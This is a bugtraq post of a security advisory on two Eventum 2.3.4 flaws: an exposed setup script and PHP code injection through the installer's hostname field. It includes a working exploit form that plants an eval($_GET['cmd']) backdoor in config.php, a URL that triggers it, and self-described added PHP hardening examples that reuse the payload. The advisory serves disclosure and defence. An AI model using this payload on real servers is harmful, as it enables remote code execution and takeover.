List: bugtraq
Subject: Multiple Vulnerabilities in Eventum
From: High-Tech Bridge Security Research <advisory () htbridge ! com>
Date: 2014-01-27 13:40:20
Message-ID: 20140127134020.DE0772C587EA () htbridge ! ch
Advisory ID: HTB23198
Product: Eventum
Vendor: Eventum Development Team
Vulnerable Version(s): 2.3.4 and probably prior
Tested Version: 2.3.4
Advisory Publication: January 22, 2014 [without technical details]
Vendor Notification: January 22, 2014
Vendor Patch: January 24, 2014
Public Disclosure: January 27, 2014
Vulnerability Type: Incorrect Default Permissions [CWE-276], Code Injection [CWE-94]
CVE References: CVE-2014-1631, CVE-2014-1632
Risk Level: Critical
CVSSv2 Base Scores: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P), 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerabilities in Eventum which can be exploited to reinstall and compromise the vulnerable application.
1) Incorrect Default Permissions in Eventum: CVE-2014-1631
The vulnerability exists due to incorrect default permissions set for the installation script. Access to the installation script located at "/setup/index.php" is not restricted by default, and the script is not deleted during the installation process. A remote attacker can access the script and reinstall the vulnerable application.
The installation script can be accessed by a remote unauthenticated user via the following URL:
http://[host]/setup/index.php
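The mitigation for an installer that stays reachable after installation is an install lock: the setup script refuses to run once a configuration exists and logs the attempt, so a post-install request to it becomes a detection signal rather than a reinstall. The guard below is an added example written for this advisory, not Eventum's own code; the config and lock file locations, the constant names and the log message format are assumptions.

```php
<?php
// Added example (not Eventum's own code): an install-lock guard to place at the
// top of a setup script such as setup/index.php. Paths and the log format are
// assumptions chosen for illustration.
declare(strict_types=1);

const CONFIG_FILE = __DIR__ . '/../config/config.php';  // assumed config location
const LOCK_FILE   = __DIR__ . '/../config/setup.lock';   // assumed lock file name

/** True once the application has been installed (config or lock file present). */
function setupIsLocked(string $configFile = CONFIG_FILE, string $lockFile = LOCK_FILE): bool
{
    return is_file($configFile) || is_file($lockFile);
}

/** Refuse to run the installer after installation and log the attempt for the SOC. */
function denySetupIfInstalled(string $configFile = CONFIG_FILE, string $lockFile = LOCK_FILE): void
{
    if (!setupIsLocked($configFile, $lockFile)) {
        return;
    }
    error_log(sprintf(
        'setup script requested after installation: client=%s method=%s uri=%s',
        $_SERVER['REMOTE_ADDR'] ?? '-',
        $_SERVER['REQUEST_METHOD'] ?? '-',
        $_SERVER['REQUEST_URI'] ?? '-'
    ));
    http_response_code(403);
    header('Content-Type: text/plain');
    echo "Setup is disabled: the application is already installed.\n";
    exit;
}

/** Called by the installer once the configuration has been written successfully. */
function writeSetupLock(string $lockFile = LOCK_FILE): void
{
    // Record the install time; the lock is the durable marker even if the
    // config file is later moved or regenerated by an administrator.
    file_put_contents($lockFile, 'installed ' . date('c') . "\n", LOCK_EX);
    chmod($lockFile, 0640);
}

// Must run before any installer logic touches the database or configuration.
denySetupIfInstalled();
```

Independently of the application, the standard hardening step is to remove or deny the setup directory at the web server after installation; the guard above covers the case where the directory is left in place, as it was here by default.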
2) Code Injection in Eventum: CVE-2014-1632
The vulnerability exists due to insufficient sanitization of the HTTP POST parameter "hostname", which is written into the "/config/config.php" script during the installation process. A remote attacker can inject and execute arbitrary PHP code on the target system with the privileges of the web server. Successful exploitation requires access to the application's database, which can be achieved by providing the address of an attacker-controlled MySQL server.
The following exploitation example injects a backdoor into "/config/config.php" file:
<form action="http://[host]/setup/index.php" method="post" name="main">
<input type="hidden" name="cat" value="install">
<input type="hidden" name="hostname" value="'); eval($_GET['cmd']); $tmp=('">
<input type="hidden" name="relative" value="/">
<input type="hidden" name="db_hostname" value="db_hostname">
<input type="hidden" name="db_name" value="db_name">
<input type="hidden" name="db_table_prefix" value="db_table_prefix">
<input type="hidden" name="drop_tables" value="yes">
<input type="hidden" name="db_username" value="db_username">
<input type="hidden" name="setup[smtp][from]" value="email@email.com">
<input type="hidden" name="setup[smtp][host]" value="localhost">
<input type="hidden" name="setup[smtp][port]" value="25">
<input type="hidden" name="" value="">
<input type="submit" id="btn">
</form>
After a successful reinstallation, an attacker can execute arbitrary PHP code on the system. The following example executes the "phpinfo()" PHP function on the vulnerable system:
http://[host]/index.php?cmd=phpinfo%28%29;
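The root cause is that the installer builds PHP source by string concatenation, so a single quote in the "hostname" value ends the string literal and whatever follows is compiled as code. The block below is an added example for this advisory, not Eventum's own installer: it shows that unsafe pattern beside a hardened writer that validates the hostname and emits the literal with var_export(), and uses PHP's tokenizer to confirm that the advisory's payload produces an eval token in the unsafe output and none in the escaped one. The constant name APP_HOSTNAME and the file layout are assumptions.

```php
<?php
// Added example (not Eventum's own code): the unsafe config-writing pattern behind
// CVE-2014-1632 beside a hardened version. APP_HOSTNAME and paths are assumptions.
declare(strict_types=1);

/** Unsafe: user input is spliced straight into PHP source. Shown only as the anti-pattern. */
function renderConfigUnsafe(string $hostname): string
{
    return "<?php\ndefine('APP_HOSTNAME', '" . $hostname . "');\n";
}

/** Reject anything that is not a syntactically valid host name before it is stored. */
function isValidHostname(string $hostname): bool
{
    return strlen($hostname) <= 253
        && filter_var($hostname, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) !== false;
}

/** Produce a correctly escaped PHP string literal; var_export() escapes quotes and backslashes. */
function quoteForPhp(string $value): string
{
    return var_export($value, true);
}

/** Hardened: validate first, then emit the value as a literal rather than as source text. */
function renderConfigSafe(string $hostname): string
{
    if (!isValidHostname($hostname)) {
        throw new InvalidArgumentException('hostname is not a valid host name');
    }
    return "<?php\ndefine('APP_HOSTNAME', " . quoteForPhp($hostname) . ");\n";
}

/** Write generated config atomically with restrictive permissions. */
function writeConfig(string $path, string $source): void
{
    $tmp = $path . '.tmp';
    if (file_put_contents($tmp, $source, LOCK_EX) === false) {
        throw new RuntimeException("cannot write $tmp");
    }
    chmod($tmp, 0640);
    rename($tmp, $path);
}

/** Count eval tokens in generated source: any hit means input has crossed into code. */
function countEvalTokens(string $source): int
{
    $n = 0;
    foreach (token_get_all($source) as $tok) {
        if (is_array($tok) && $tok[0] === T_EVAL) {
            $n++;
        }
    }
    return $n;
}

// Constructed input: the "hostname" value from the advisory's example, plus a benign one.
$payload = "'); eval(\$_GET['cmd']); \$tmp=('";
$benign  = 'tracker.example.com';

// Unsafe writer: the quote in the payload terminates the literal, so eval() becomes code.
echo 'unsafe output eval tokens:  ', countEvalTokens(renderConfigUnsafe($payload)), "\n";   // 1

// Escaping alone already keeps the payload inside one string literal (zero eval tokens).
$escapedOnly = "<?php\ndefine('APP_HOSTNAME', " . quoteForPhp($payload) . ");\n";
echo 'escaped output eval tokens: ', countEvalTokens($escapedOnly), "\n";                    // 0

// The hardened writer rejects the payload outright and accepts a real host name.
try {
    renderConfigSafe($payload);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
echo renderConfigSafe($benign);   // define('APP_HOSTNAME', 'tracker.example.com');
```

Validation and escaping are kept separate on purpose: the allow-list check is what a reviewer can reason about, while var_export() is the safety net that keeps a value a value even if the check is later loosened. The tokenizer check is the same idea a unit test for an installer can use to assert that no configuration input ever yields executable tokens.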
-----------------------------------------------------------------------------------------------
Solution:
Update to Eventum 2.3.5
More Information:
https://bugs.launchpad.net/eventum/+bug/1271499
The vendor disclosed the vulnerabilities and authorized us to release the advisory publicly before our usual delay (3 weeks).
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23198 - https://www.htbridge.com/advisory/HTB23198 - Multiple Vulnerabilities in Eventum.
[2] Eventum - https://launchpad.net/eventum - Eventum is a user-friendly and flexible issue tracking system that can be used by a support department to track incoming technical support requests, or by a software development team to quickly organize tasks and bugs.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with a SaaS delivery model that combines manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.